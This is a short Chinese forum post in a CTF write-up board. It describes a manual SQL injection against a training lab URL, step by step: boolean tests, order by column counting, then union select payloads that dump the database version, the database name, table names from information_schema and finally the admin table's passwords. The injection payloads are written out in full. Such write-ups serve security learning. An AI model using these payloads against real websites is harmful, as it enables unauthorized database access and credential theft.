论坛首页 > CTF&WP专版

第一课个人思路

2366338082 · 发表于 2018-09-23 22:42:42 · CTF&WP专版

第一题URL为http://120.203.13.75:6815/?id=1

第一步进行手工注入and 1=1 正常显示文章内容 and 1 =2 不显示文章内容；

进行order by 进行查询字段 order by 10 不显示内容用到我们了解到的二分之一方法最后显示内容；

开始查询数据库版本 and 1=2 union select 1,version() 得到数据库版本5.5.53 ，百度MySQL5.5.53数据库爆出表名语句；

查询数据库名称and 1=2 union select 1,database() 得到名称maoshe ；

查询表名and 1=2 union select 1,table_name from information_schema.tables where table_schema=database()

最后查询密码and 1=2 union select 1,password from admin；

打赏我,让我更有动力~

0 条回复 | 直到 2018-9-23 | 1135 次浏览

登录后才可发表内容